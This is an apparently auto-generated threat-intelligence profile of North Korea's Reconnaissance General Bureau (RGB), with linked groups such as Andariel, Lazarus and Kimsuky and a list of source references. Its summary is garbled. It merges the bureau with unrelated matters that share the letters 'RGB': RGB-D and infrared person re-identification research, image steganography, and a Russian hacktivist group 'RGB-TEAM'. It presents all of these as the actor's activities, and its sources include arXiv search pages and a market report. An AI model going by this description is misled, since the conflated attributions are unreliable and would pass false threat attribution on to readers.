Rgb

Threat Actor updated 24 days ago (2024-08-14T10:18:11.585Z)
Download STIX
Preview STIX
RGB is a threat actor group associated with North Korea's Reconnaissance General Bureau (RGB), which has been involved in numerous cyber espionage activities. The RGB 3rd Bureau, based in Pyongyang and Sinuiju, includes state-sponsored cyber groups known as Andariel, Onyx Sleet (formerly PLUTONIUM), DarkSeoul, Silent Chollima, and Stonefly/Clasiopa. These actors have been implicated in various malicious activities, including the use of custom malware, such as 'Maui', to encrypt and extort ransom payments from U.S. healthcare entities. The indictment alleges that Rim, an operative working for the RGB, participated in these operations, using the laundered proceeds from the ransomware attacks to fund further espionage activities. The RGB's activities extend beyond traditional RGB systems, incorporating RGB-D and RGB-Infrared (IR) cross-modality person re-identification (re-ID). Despite expectations that RGB-D systems would be more robust against adversarial examples, they have proven to be highly vulnerable, especially to adversarial patch attacks. Furthermore, the RGB's techniques include pixel-hiding and other steganographic methods, posing a danger when hidden data is read by a program capable of extracting and executing the malicious code. In response to RGB's activities, the U.S. Federal Bureau of Investigation (FBI) and other authoring partners have released a cybersecurity advisory. Recommended defensive measures include monitoring for suspicious command-line activity, implementing multi-factor authentication for remote access services, and properly segmenting and using allow-listing tools for critical assets. Despite these efforts, the RGB continues to pose a significant threat, with recent claims by the Russian-speaking hacktivist group RGB-TEAM of breaching Russia’s prosecutor general’s website and leaking criminal records. Entities associated with certain industries should remain vigilant in defending their networks from these ongoing cyber threats.
Description last updated: 2024-08-14T09:36:29.989Z
What's your take? (Question 1 of 5)
Help tune the shared Cybergeist dataset, assist your peers, and earn karma. Expand the panel to get started.
Possible Aliases / Cluster overlaps
It's hard to track cluster overlaps and naming conventions between vendors, so here are some possible overlapping names / profiles you also may want to look at.
IDVotesProfile Description
Andariel
5
Andariel, a state-backed threat group linked to North Korea's Reconnaissance General Bureau, has been identified as a significant cyber threat. The group has demonstrated its capabilities by compromising critical national infrastructure organizations, accessing classified technical information and i
Miscellaneous Associations
Other elements of context that could aid in the identification of relevance
Reconnaissance
Korean
State Sponso...
Malware
Ransomware
Jumpcloud
Espionage
Mandiant
Exploits
Dprk
Analyst Notes & Discussion
Be the first to leave your mark here! Log in to share your views and vote.
Associated Threat Actors
To see the evidence that has resulted in these threatActor associations, create a free account
IDTypeVotesProfile Description
KimsukyUnspecified
2
Kimsuky, also known as Springtail, ARCHIPELAGO, Black Banshee, Thallium, Velvet Chollima, and APT43, is a North Korea-linked threat actor first identified by a Kaspersky researcher in 2013. This cyberespionage group has been associated with various malicious activities, including spear-phishing camp
APT38Unspecified
2
APT38, also known as TA444, BlueNoroff, BlackAlicanto, Coperenicum, Sapphire Sleet, and Stardust Chollima, is a North Korea-linked advanced persistent threat (APT) group. It has conducted operations in over 16 organizations across at least 11 countries, primarily targeting financial institutions wor
BluenoroffUnspecified
2
BlueNoroff, a threat actor closely associated with the notorious Lazarus Group, has been actively involved in malicious cyber activities primarily targeting financial institutions and cryptocurrency businesses. Known for its sophisticated attacks on banks, casinos, fintech companies, POST software,
temp.hermitUnspecified
2
Temp.Hermit, also known as Lazarus Group or Hidden Cobra, is a threat actor group associated with North Korea's Reconnaissance General Bureau (RGB). The group has been operational since 2013 and is known for its cyberespionage activities targeting governments and sectors such as defense, telecommuni
Lazarus GroupUnspecified
2
The Lazarus Group, a notorious threat actor associated with North Korea, has been implicated in several high-profile cyber attacks and exploitation activities. The group's objective often involves establishing a kernel read/write primitive, which allows them to gain high-level access to systems and
Apt43Unspecified
2
APT43, also known as Kimsuky, is a North Korean state-sponsored advanced persistent threat (APT) group that has been actively involved in cybercrime and espionage. The group has been implicated in a series of attacks exploiting vulnerabilities, which have drawn the attention of various cybersecurity
Source Document References
Information about the Rgb Threat Actor was read from the documents corpus below. This display is limited to 20 results, create a free account to see more
PreviewSource LinkCreatedAtTitle
Flashpoint
a month ago
COURT DOC: North Korean Government Hacker Charged for Involvement in Ransomware Attacks Targeting U.S. Hospitals and Health Care Providers
CISA
a month ago
North Korea Cyber Group Conducts Global Espionage Campaign to Advance Regime’s Military and Nuclear Programs | CISA
ESET
5 months ago
Malware hiding in pictures? More likely than you think
Checkpoint
5 months ago
8th April – Threat Intelligence Report - Check Point Research
CERT-EU
6 months ago
Hackaday Podcast Episode 261: Rickroll Toothbrush, Keyboard Cat, Zombie Dialup
CERT-EU
6 months ago
Search | arXiv e-print repository
CERT-EU
6 months ago
Chinese PC-maker Acemagic's machines infected with malware
CERT-EU
6 months ago
Search | arXiv e-print repository
DARKReading
7 months ago
Critical ConnectWise RMM Bug Poised for Exploitation Avalanche
CERT-EU
8 months ago
Search | arXiv e-print repository
CERT-EU
10 months ago
Search | arXiv e-print repository
CERT-EU
a year ago
Search | arXiv e-print repository
CERT-EU
a year ago
Search | arXiv e-print repository
CERT-EU
8 months ago
Search | arXiv e-print repository
CERT-EU
9 months ago
Content Protection Market to grow by USD 1.03 billion from 2023 to 2028 | Market is fragmented due to the presence of prominent companies like Adobe Inc., Alphabet Inc. and Cisco Systems Inc., and many more - Technavio
CERT-EU
9 months ago
Search | arXiv e-print repository
CERT-EU
9 months ago
Search | arXiv e-print repository
CERT-EU
9 months ago
Search | arXiv e-print repository
CERT-EU
9 months ago
Mini Meters Monitor Microprocessor Maximization
CERT-EU
9 months ago
U.S. government sanctions prolific North Korean cyber espionage unit